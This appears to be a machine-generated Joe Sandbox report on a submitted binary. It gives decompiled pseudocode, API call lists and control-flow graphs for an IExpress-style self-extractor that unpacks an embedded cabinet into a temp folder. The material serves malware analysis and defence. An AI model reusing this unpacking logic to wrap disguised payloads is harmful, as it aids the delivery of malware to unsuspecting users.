                                                                                                                                                                                                          0x00865b16
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865b16
                                                                                                                                                                                                          0x00865a7c
                                                                                                                                                                                                          0x00865a8a
                                                                                                                                                                                                          0x00865aa5
                                                                                                                                                                                                          0x00865aab
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008659bb
                                                                                                                                                                                                          0x008659c0
                                                                                                                                                                                                          0x008659c7
                                                                                                                                                                                                          0x008659d1
                                                                                                                                                                                                          0x008659d6
                                                                                                                                                                                                          0x00865c05
                                                                                                                                                                                                          0x00865c14
                                                                                                                                                                                                          0x00865c14

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 008659A8
                                                                                                                                                                                                          • SetCurrentDirectoryA.KERNELBASE(?), ref: 008659AF
                                                                                                                                                                                                          • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00865A13
                                                                                                                                                                                                          • MulDiv.KERNEL32(?,?,00000400), ref: 00865A40
                                                                                                                                                                                                          • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00865A64
                                                                                                                                                                                                          • memset.MSVCRT ref: 00865A7C
                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00865A98
                                                                                                                                                                                                          • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00865AA5
                                                                                                                                                                                                          • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00865BFC
                                                                                                                                                                                                            • Part of subcall function 008644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00864518
                                                                                                                                                                                                            • Part of subcall function 008644B9: MessageBoxA.USER32(?,?,herso,00010010), ref: 00864554
                                                                                                                                                                                                            • Part of subcall function 00866285: GetLastError.KERNEL32(00865BBC), ref: 00866285
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4237285672-0
                                                                                                                                                                                                          • Opcode ID: 7e66c4d7e2375731a62f98ee08c74d5c4f08ecb4ade5aa82faa5f82c09e61a4d
                                                                                                                                                                                                          • Instruction ID: df7d1d3016f0261925ef8f6be6f8bce8509fa20ac6340a4123212b82558b4b5a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e66c4d7e2375731a62f98ee08c74d5c4f08ecb4ade5aa82faa5f82c09e61a4d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F71AFB190061CAFEB259F64DC85FFA77ACFB48304F1651A9F446D6280EA709E848F61
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 374 864fe0-86501a call 86468f FindResourceA LoadResource LockResource 377 865020-865027 374->377 378 865161-865163 374->378 379 865057-86505e call 864efd 377->379 380 865029-865051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->380 383 865060-865077 call 8644b9 379->383 384 86507c-8650b4 379->384 380->379 388 865107-86510e 383->388 389 8650b6-8650da 384->389 390 8650e8-865104 call 8644b9 384->390 391 865110-865117 FreeResource 388->391 392 86511d-86511f 388->392 398 865106 389->398 402 8650dc 389->402 390->398 391->392 395 865121-865127 392->395 396 86513a-865141 392->396 395->396 399 865129-865135 call 8644b9 395->399 400 865143-86514a 396->400 401 86515f 396->401 398->388 399->396 400->401 404 86514c-865159 SendMessageA 400->404 401->378 405 8650e3-8650e6 402->405 404->401 405->390 405->398
                                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                                          			E00864FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* _t8;
                                                                                                                                                                                                          				struct HWND__* _t9;
                                                                                                                                                                                                          				int _t10;
                                                                                                                                                                                                          				void* _t12;
                                                                                                                                                                                                          				struct HWND__* _t24;
                                                                                                                                                                                                          				struct HWND__* _t27;
                                                                                                                                                                                                          				intOrPtr _t29;
                                                                                                                                                                                                          				void* _t33;
                                                                                                                                                                                                          				int _t34;
                                                                                                                                                                                                          				CHAR* _t36;
                                                                                                                                                                                                          				int _t37;
                                                                                                                                                                                                          				intOrPtr _t47;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t33 = __edi;
                                                                                                                                                                                                          				_t36 = "CABINET";
                                                                                                                                                                                                          				 *0x869144 = E0086468F(_t36, 0, 0);
                                                                                                                                                                                                          				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                          				 *0x869140 = _t8;
                                                                                                                                                                                                          				if(_t8 == 0) {
                                                                                                                                                                                                          					return _t8;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t9 =  *0x868584; // 0x0
                                                                                                                                                                                                          				if(_t9 != 0) {
                                                                                                                                                                                                          					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                          					ShowWindow(GetDlgItem( *0x868584, 0x841), 5);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t10 = E00864EFD(0, 0);
                                                                                                                                                                                                          				if(_t10 != 0) {
                                                                                                                                                                                                          					__imp__#20(E00864CA0, E00864CC0, E00864980, E00864A50, E00864AD0, E00864B60, E00864BC0, 1, 0x869148, _t33);
                                                                                                                                                                                                          					_t34 = _t10;
                                                                                                                                                                                                          					if(_t34 == 0) {
                                                                                                                                                                                                          						L8:
                                                                                                                                                                                                          						_t29 =  *0x869148; // 0x0
                                                                                                                                                                                                          						_t24 =  *0x868584; // 0x0
                                                                                                                                                                                                          						E008644B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                          						_t37 = 0;
                                                                                                                                                                                                          						L9:
                                                                                                                                                                                                          						goto L10;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					__imp__#22(_t34, "*MEMCAB", 0x861140, 0, E00864CD0, 0, 0x869140); // executed
                                                                                                                                                                                                          					_t37 = _t10;
                                                                                                                                                                                                          					if(_t37 == 0) {
                                                                                                                                                                                                          						goto L9;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					__imp__#23(_t34); // executed
                                                                                                                                                                                                          					if(_t10 != 0) {
                                                                                                                                                                                                          						goto L9;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					goto L8;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t27 =  *0x868584; // 0x0
                                                                                                                                                                                                          					E008644B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                          					_t37 = 0;
                                                                                                                                                                                                          					L10:
                                                                                                                                                                                                          					_t12 =  *0x869140; // 0x0
                                                                                                                                                                                                          					if(_t12 != 0) {
                                                                                                                                                                                                          						FreeResource(_t12);
                                                                                                                                                                                                          						 *0x869140 = 0;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(_t37 == 0) {
                                                                                                                                                                                                          						_t47 =  *0x8691d8; // 0x0
                                                                                                                                                                                                          						if(_t47 == 0) {
                                                                                                                                                                                                          							E008644B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(( *0x868a38 & 0x00000001) == 0 && ( *0x869a34 & 0x00000001) == 0) {
                                                                                                                                                                                                          						SendMessageA( *0x868584, 0xfa1, _t37, 0);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					return _t37;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}
















                                                                                                                                                                                                          0x00864fe0
                                                                                                                                                                                                          0x00864fe6
                                                                                                                                                                                                          0x00864ff9
                                                                                                                                                                                                          0x0086500d
                                                                                                                                                                                                          0x00865013
                                                                                                                                                                                                          0x0086501a
                                                                                                                                                                                                          0x00865163
                                                                                                                                                                                                          0x00865163
                                                                                                                                                                                                          0x00865020
                                                                                                                                                                                                          0x00865027
                                                                                                                                                                                                          0x00865037
                                                                                                                                                                                                          0x00865051
                                                                                                                                                                                                          0x00865051
                                                                                                                                                                                                          0x00865057
                                                                                                                                                                                                          0x0086505e
                                                                                                                                                                                                          0x008650a7
                                                                                                                                                                                                          0x008650ad
                                                                                                                                                                                                          0x008650b4
                                                                                                                                                                                                          0x008650e8
                                                                                                                                                                                                          0x008650e8
                                                                                                                                                                                                          0x008650ee
                                                                                                                                                                                                          0x008650ff
                                                                                                                                                                                                          0x00865104
                                                                                                                                                                                                          0x00865106
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865106
                                                                                                                                                                                                          0x008650cd
                                                                                                                                                                                                          0x008650d3
                                                                                                                                                                                                          0x008650da
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008650dd
                                                                                                                                                                                                          0x008650e6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865060
                                                                                                                                                                                                          0x00865060
                                                                                                                                                                                                          0x00865070
                                                                                                                                                                                                          0x00865075
                                                                                                                                                                                                          0x00865107
                                                                                                                                                                                                          0x00865107
                                                                                                                                                                                                          0x0086510e
                                                                                                                                                                                                          0x00865111
                                                                                                                                                                                                          0x00865117
                                                                                                                                                                                                          0x00865117
                                                                                                                                                                                                          0x0086511f
                                                                                                                                                                                                          0x00865121
                                                                                                                                                                                                          0x00865127
                                                                                                                                                                                                          0x00865135
                                                                                                                                                                                                          0x00865135
                                                                                                                                                                                                          0x00865127
                                                                                                                                                                                                          0x00865141
                                                                                                                                                                                                          0x00865159
                                                                                                                                                                                                          0x00865159
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086515f

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0086468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008646A0
                                                                                                                                                                                                            • Part of subcall function 0086468F: SizeofResource.KERNEL32(00000000,00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646A9
                                                                                                                                                                                                            • Part of subcall function 0086468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008646C3
                                                                                                                                                                                                            • Part of subcall function 0086468F: LoadResource.KERNEL32(00000000,00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646CC
                                                                                                                                                                                                            • Part of subcall function 0086468F: LockResource.KERNEL32(00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646D3
                                                                                                                                                                                                            • Part of subcall function 0086468F: memcpy_s.MSVCRT ref: 008646E5
                                                                                                                                                                                                            • Part of subcall function 0086468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008646EF
                                                                                                                                                                                                          • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00864FFE
                                                                                                                                                                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 00865006
                                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 0086500D
                                                                                                                                                                                                          • GetDlgItem.USER32(00000000,00000842), ref: 00865030
                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00865037
                                                                                                                                                                                                          • GetDlgItem.USER32(00000841,00000005), ref: 0086504A
                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00865051
                                                                                                                                                                                                          • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00865111
                                                                                                                                                                                                          • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00865159
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                          • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                          • API String ID: 1305606123-2642027498
                                                                                                                                                                                                          • Opcode ID: a32654f5b712050b269d6836313ba3a21d4681fef072947346c1f8a102534bfb
                                                                                                                                                                                                          • Instruction ID: dddf5de5dfc9953196955a43eb4e50849161f9d9a068b2e09537eac3cec3b816
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a32654f5b712050b269d6836313ba3a21d4681fef072947346c1f8a102534bfb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE31D3B0640711FBD7205B65AD8EF2B365CF706B55F072024F916E63E1DAF98C408A62
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 406 862f1d-862f3d 407 862f3f-862f46 406->407 408 862f6c-862f73 call 865164 406->408 409 862f5f-862f66 call 863a3f 407->409 410 862f48 call 8651e5 407->410 415 863041 408->415 416 862f79-862f80 call 8655a0 408->416 409->408 409->415 417 862f4d-862f4f 410->417 420 863043-863053 call 866ce0 415->420 416->415 424 862f86-862fbe GetSystemDirectoryA call 86658a LoadLibraryA 416->424 417->415 421 862f55-862f5d 417->421 421->408 421->409 428 862ff7-863004 FreeLibrary 424->428 429 862fc0-862fd4 GetProcAddress 424->429 431 863006-86300c 428->431 432 863017-863024 SetCurrentDirectoryA 428->432 429->428 430 862fd6-862fee DecryptFileA 429->430 430->428 442 862ff0-862ff5 430->442 431->432 435 86300e call 86621e 431->435 433 863026-86303c call 8644b9 call 866285 432->433 434 863054-86305a 432->434 433->415 438 863065-86306c 434->438 439 86305c call 863b26 434->439 446 863013-863015 435->446 444 86306e-863075 call 86256d 438->444 445 86307c-863089 438->445 451 863061-863063 439->451 442->428 452 86307a 444->452 448 8630a1-8630a9 445->448 449 86308b-863091 445->449 446->415 446->432 455 8630b4-8630b7 448->455 456 8630ab-8630ad 448->456 449->448 453 863093 call 863ba2 449->453 451->415 451->438 452->445 459 863098-86309a 453->459 455->420 456->455 458 8630af call 864169 456->458 458->455 459->415 461 86309c 459->461 461->448
                                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                                          			E00862F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v272;
                                                                                                                                                                                                          				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t9;
                                                                                                                                                                                                          				void* _t11;
                                                                                                                                                                                                          				struct HWND__* _t12;
                                                                                                                                                                                                          				void* _t14;
                                                                                                                                                                                                          				int _t21;
                                                                                                                                                                                                          				signed int _t22;
                                                                                                                                                                                                          				signed int _t25;
                                                                                                                                                                                                          				intOrPtr* _t26;
                                                                                                                                                                                                          				signed int _t27;
                                                                                                                                                                                                          				void* _t30;
                                                                                                                                                                                                          				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                          				struct HINSTANCE__* _t36;
                                                                                                                                                                                                          				intOrPtr _t41;
                                                                                                                                                                                                          				intOrPtr* _t44;
                                                                                                                                                                                                          				signed int _t46;
                                                                                                                                                                                                          				int _t47;
                                                                                                                                                                                                          				void* _t58;
                                                                                                                                                                                                          				void* _t59;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t43 = __edx;
                                                                                                                                                                                                          				_t9 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                          				if( *0x868a38 != 0) {
                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                          					_t11 = E00865164(_t52);
                                                                                                                                                                                                          					_t53 = _t11;
                                                                                                                                                                                                          					if(_t11 == 0) {
                                                                                                                                                                                                          						L16:
                                                                                                                                                                                                          						_t12 = 0;
                                                                                                                                                                                                          						L17:
                                                                                                                                                                                                          						return E00866CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t14 = E008655A0(_t53); // executed
                                                                                                                                                                                                          					if(_t14 == 0) {
                                                                                                                                                                                                          						goto L16;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t45 = 0x105;
                                                                                                                                                                                                          						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                          						_t43 = 0x105;
                                                                                                                                                                                                          						_t40 =  &_v272;
                                                                                                                                                                                                          						E0086658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                          						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                          						_t44 = 0;
                                                                                                                                                                                                          						if(_t36 != 0) {
                                                                                                                                                                                                          							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                          							_v276 = _t31;
                                                                                                                                                                                                          							if(_t31 != 0) {
                                                                                                                                                                                                          								_t45 = _t47;
                                                                                                                                                                                                          								_t40 = _t31;
                                                                                                                                                                                                          								 *0x86a288("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\", 0); // executed
                                                                                                                                                                                                          								_v276();
                                                                                                                                                                                                          								if(_t47 != _t47) {
                                                                                                                                                                                                          									_t40 = 4;
                                                                                                                                                                                                          									asm("int 0x29");
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						FreeLibrary(_t36);
                                                                                                                                                                                                          						_t58 =  *0x868a24 - _t44; // 0x0
                                                                                                                                                                                                          						if(_t58 != 0) {
                                                                                                                                                                                                          							L14:
                                                                                                                                                                                                          							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\"); // executed
                                                                                                                                                                                                          							if(_t21 != 0) {
                                                                                                                                                                                                          								__eflags =  *0x868a2c - _t44; // 0x0
                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                          									L20:
                                                                                                                                                                                                          									__eflags =  *0x868d48 & 0x000000c0;
                                                                                                                                                                                                          									if(( *0x868d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                          										_t41 =  *0x869a40; // 0x3, executed
                                                                                                                                                                                                          										_t26 = E0086256D(_t41); // executed
                                                                                                                                                                                                          										_t44 = _t26;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t22 =  *0x868a24; // 0x0
                                                                                                                                                                                                          									 *0x869a44 = _t44;
                                                                                                                                                                                                          									__eflags = _t22;
                                                                                                                                                                                                          									if(_t22 != 0) {
                                                                                                                                                                                                          										L26:
                                                                                                                                                                                                          										__eflags =  *0x868a38;
                                                                                                                                                                                                          										if( *0x868a38 == 0) {
                                                                                                                                                                                                          											__eflags = _t22;
                                                                                                                                                                                                          											if(__eflags == 0) {
                                                                                                                                                                                                          												E00864169(__eflags);
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_t12 = 1;
                                                                                                                                                                                                          										goto L17;
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										__eflags =  *0x869a30 - _t22; // 0x0
                                                                                                                                                                                                          										if(__eflags != 0) {
                                                                                                                                                                                                          											goto L26;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_t25 = E00863BA2(); // executed
                                                                                                                                                                                                          										__eflags = _t25;
                                                                                                                                                                                                          										if(_t25 == 0) {
                                                                                                                                                                                                          											goto L16;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_t22 =  *0x868a24; // 0x0
                                                                                                                                                                                                          										goto L26;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t27 = E00863B26(_t40, _t44);
                                                                                                                                                                                                          								__eflags = _t27;
                                                                                                                                                                                                          								if(_t27 == 0) {
                                                                                                                                                                                                          									goto L16;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								goto L20;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t43 = 0x4bc;
                                                                                                                                                                                                          							E008644B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                          							 *0x869124 = E00866285();
                                                                                                                                                                                                          							goto L16;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t59 =  *0x869a30 - _t44; // 0x0
                                                                                                                                                                                                          						if(_t59 != 0) {
                                                                                                                                                                                                          							goto L14;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t30 = E0086621E(); // executed
                                                                                                                                                                                                          						if(_t30 == 0) {
                                                                                                                                                                                                          							goto L16;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L14;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t49 =  *0x868a24;
                                                                                                                                                                                                          				if( *0x868a24 != 0) {
                                                                                                                                                                                                          					L4:
                                                                                                                                                                                                          					_t34 = E00863A3F(_t51);
                                                                                                                                                                                                          					_t52 = _t34;
                                                                                                                                                                                                          					if(_t34 == 0) {
                                                                                                                                                                                                          						goto L16;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					goto L5;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(E008651E5(_t49) == 0) {
                                                                                                                                                                                                          					goto L16;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t51 =  *0x868a38;
                                                                                                                                                                                                          				if( *0x868a38 != 0) {
                                                                                                                                                                                                          					goto L5;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				goto L4;
                                                                                                                                                                                                          			}




























                                                                                                                                                                                                          0x00862f1d
                                                                                                                                                                                                          0x00862f28
                                                                                                                                                                                                          0x00862f2f
                                                                                                                                                                                                          0x00862f3d
                                                                                                                                                                                                          0x00862f6c
                                                                                                                                                                                                          0x00862f6c
                                                                                                                                                                                                          0x00862f71
                                                                                                                                                                                                          0x00862f73
                                                                                                                                                                                                          0x00863041
                                                                                                                                                                                                          0x00863041
                                                                                                                                                                                                          0x00863043
                                                                                                                                                                                                          0x00863053
                                                                                                                                                                                                          0x00863053
                                                                                                                                                                                                          0x00862f79
                                                                                                                                                                                                          0x00862f80
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00862f86
                                                                                                                                                                                                          0x00862f86
                                                                                                                                                                                                          0x00862f93
                                                                                                                                                                                                          0x00862f9e
                                                                                                                                                                                                          0x00862fa0
                                                                                                                                                                                                          0x00862fa6
                                                                                                                                                                                                          0x00862fb8
                                                                                                                                                                                                          0x00862fba
                                                                                                                                                                                                          0x00862fbe
                                                                                                                                                                                                          0x00862fc6
                                                                                                                                                                                                          0x00862fcc
                                                                                                                                                                                                          0x00862fd4
                                                                                                                                                                                                          0x00862fd6
                                                                                                                                                                                                          0x00862fd8
                                                                                                                                                                                                          0x00862fe0
                                                                                                                                                                                                          0x00862fe6
                                                                                                                                                                                                          0x00862fee
                                                                                                                                                                                                          0x00862ff0
                                                                                                                                                                                                          0x00862ff5
                                                                                                                                                                                                          0x00862ff5
                                                                                                                                                                                                          0x00862fee
                                                                                                                                                                                                          0x00862fd4
                                                                                                                                                                                                          0x00862ff8
                                                                                                                                                                                                          0x00862ffe
                                                                                                                                                                                                          0x00863004
                                                                                                                                                                                                          0x00863017
                                                                                                                                                                                                          0x0086301c
                                                                                                                                                                                                          0x00863024
                                                                                                                                                                                                          0x00863054
                                                                                                                                                                                                          0x0086305a
                                                                                                                                                                                                          0x00863065
                                                                                                                                                                                                          0x00863065
                                                                                                                                                                                                          0x0086306c
                                                                                                                                                                                                          0x0086306e
                                                                                                                                                                                                          0x00863075
                                                                                                                                                                                                          0x0086307a
                                                                                                                                                                                                          0x0086307a
                                                                                                                                                                                                          0x0086307c
                                                                                                                                                                                                          0x00863081
                                                                                                                                                                                                          0x00863087
                                                                                                                                                                                                          0x00863089
                                                                                                                                                                                                          0x008630a1
                                                                                                                                                                                                          0x008630a1
                                                                                                                                                                                                          0x008630a9
                                                                                                                                                                                                          0x008630ab
                                                                                                                                                                                                          0x008630ad
                                                                                                                                                                                                          0x008630af
                                                                                                                                                                                                          0x008630af
                                                                                                                                                                                                          0x008630ad
                                                                                                                                                                                                          0x008630b6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086308b
                                                                                                                                                                                                          0x0086308b
                                                                                                                                                                                                          0x00863091
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863093
                                                                                                                                                                                                          0x00863098
                                                                                                                                                                                                          0x0086309a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086309c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086309c
                                                                                                                                                                                                          0x00863089
                                                                                                                                                                                                          0x0086305c
                                                                                                                                                                                                          0x00863061
                                                                                                                                                                                                          0x00863063
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863063
                                                                                                                                                                                                          0x0086302b
                                                                                                                                                                                                          0x00863032
                                                                                                                                                                                                          0x0086303c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086303c
                                                                                                                                                                                                          0x00863006
                                                                                                                                                                                                          0x0086300c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086300e
                                                                                                                                                                                                          0x00863015
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863015
                                                                                                                                                                                                          0x00862f80
                                                                                                                                                                                                          0x00862f3f
                                                                                                                                                                                                          0x00862f46
                                                                                                                                                                                                          0x00862f5f
                                                                                                                                                                                                          0x00862f5f
                                                                                                                                                                                                          0x00862f64
                                                                                                                                                                                                          0x00862f66
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00862f66
                                                                                                                                                                                                          0x00862f4f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00862f55
                                                                                                                                                                                                          0x00862f5d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32 ref: 00862F93
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00862FB2
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00862FC6
                                                                                                                                                                                                          • DecryptFileA.ADVAPI32 ref: 00862FE6
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00862FF8
                                                                                                                                                                                                          • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0086301C
                                                                                                                                                                                                            • Part of subcall function 008651E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00862F4D,?,00000002,00000000), ref: 00865201
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
